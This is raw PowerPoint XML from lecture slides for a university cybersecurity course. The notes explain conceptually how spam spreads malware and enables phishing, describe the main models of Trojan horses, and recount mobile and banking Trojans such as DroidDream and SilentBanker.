              <a:t>While some spam is sent from legitimate mail servers, most recent spam is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>sent by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> using compromised user systems, as we discuss in Section 6.6 . A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>significant portion of spam e-mail content is just advertising, trying to convince</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the recipient to purchase some product online, such as pharmaceuticals, or used in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>scams, such as stock scams or money mule job ads. But spam is also a significant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>carrier of malware. The e-mail may have an attached document, which, if opened,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>may exploit a software vulnerability to install malware on the user’s system, as we</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>discussed in the previous section. Or, it may have an attached Trojan horse program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>or scripting code that, if run, also installs malware on the user’s system. Some</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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avoid the need for user agreement by exploiting a software vulnerability in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>order to install themselves, as we discuss next. Finally the spam may be used in a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>phishing attack, typically directing the user either to a fake Web site that mirrors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>some legitimate service, such as an online banking site, where it attempts to capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the user’s login and password details; or to complete some form with sufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>personal details to allow the attacker to impersonate the user in an identity theft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>All of these uses make spam e-mails a significant security concern. However, in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>many cases, it requires the user’s active choice to view the e-mail and any attached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>document, or to permit the installation of some program, in order for the compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>to occur.</a:t>
            </a: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Trojan Horses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A Trojan horse is a useful, or apparently useful, program or utility containing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>hidden code that, when invoked, performs some unwanted or harmful function.</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 programs can be used to accomplish functions indirectly that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the attacker could not accomplish directly. For example, to gain access to sensitive,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>personal information stored in the files of a user, an attacker could create a Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>horse program that, when executed, scans the user’s files for the desired sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>information and sends a copy of it to the attacker via a Web form or e-mail or text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>message. The author could then entice users to run the program by incorporating it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>into a game or useful utility program, and making it available via a known software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>distribution site or app store. This approach has been used recently with utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>that “claim” to be the latest anti-virus scanner, or security update, for systems, but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>which are actually malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>, often carrying payloads such as spyware that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>searches for banking credentials. Hence, users need to take precautions to validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the source of any software they install.</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Trojan horses fit into one of three models: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and additionally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>performing a separate malicious activity</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Continuing to perform the function of the original program but modifying the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>function to perform malicious activity (e.g., a Trojan horse version of a login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>program that collects passwords) or to disguise other malicious activity (e.g., a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Trojan horse version of a process listing program that does not display certain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>processes that are malicious)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>• Performing a malicious function that completely replaces the function of the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>original program</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b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Mobile Phone Trojans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65"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Mobile phone Trojans also first appeared in 2004 with the discovery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Skuller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2011, Google removed a number of apps from the Android Market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were Trojans containing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DroidDream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malware. This is a powerful zombie agent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exploited vulnerabilities in some versions of Android used at this time to gain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full access to the system to monitor data and install additional code. However, this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just one of 49 families of Android malware analyzed in [ZHOU12]. They reviewed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1200 malware samples found in various Android marketplaces, and noted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90% of these resulted in the compromised phone being added to a botnet, often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support for accessing premium services or for harvesting user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They further noted that none of the mobile anti-virus products they tested were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able to detect all of these families. Hence, further development of these products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was clearly needed, especially given the rapid evolution of this category of malware.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tighter controls that Apple impose on their app store, mean that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iPhone Trojans seen to date target “jail-broken” phones, and are distributed via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unofficial sites. However a number of versions of the iPhone O/S contained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form of graphic or PDF vulnerability. Indeed these vulnerabilities were the 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used to “jail-break” the phones. But they also provided a path that malware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could use to target the phones. While Apple has fixed a number of these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new variants continued to be discovered. This is yet another illustration of just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how difficult it is, for even well resourced organizations, to write secure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within a complex system, such as an operating system. We return to this topic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Chapters 10 and 11.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8685213"/>
            <a:ext cx="2971800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16EB63E4-2A6A-4607-9B0C-53260A018263}" type="slidenum">
              <a:rPr lang="en-AU"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1428552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SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was a Trojan that generally installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.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AE6EF5E0-C2FA-5142-86EE-14490FC049AF}" type="slidenum">
              <a:rPr lang="en-US">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040976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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="4495800"/>
            <a:ext cx="11709421"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9" name="Shape 9"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>497</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special Topic - Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="YorkCollege_Logo_Horizontal.pdf"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="7299866"/>
            <a:ext cx="7531100" cy="1450434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 1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r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Lynn Ray</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Department of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Engineering and Computer Science</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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727200" y="221672"/>
            <a:ext cx="9118600" cy="1787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6400">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>497</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special Topic -Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr sz="6400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008751"/>
              </a:solidFill>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15" name="Shape 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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4" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="1968500"/>
            <a:ext cx="4876867"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25" name="Shape 25"/>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26" name="Shape 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="330200"/>
            <a:ext cx="5080000" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 27"/>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30" name="Shape 30"/>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1" name="Shape 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2324100"/>
            <a:ext cx="5080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2" name="Shape 3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34" name="Shape 34"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 35"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8369300" y="2324100"/>
            <a:ext cx="4064000" cy="6565900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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36" name="Shape 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12244701" y="9359900"/>
            <a:ext cx="239603" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
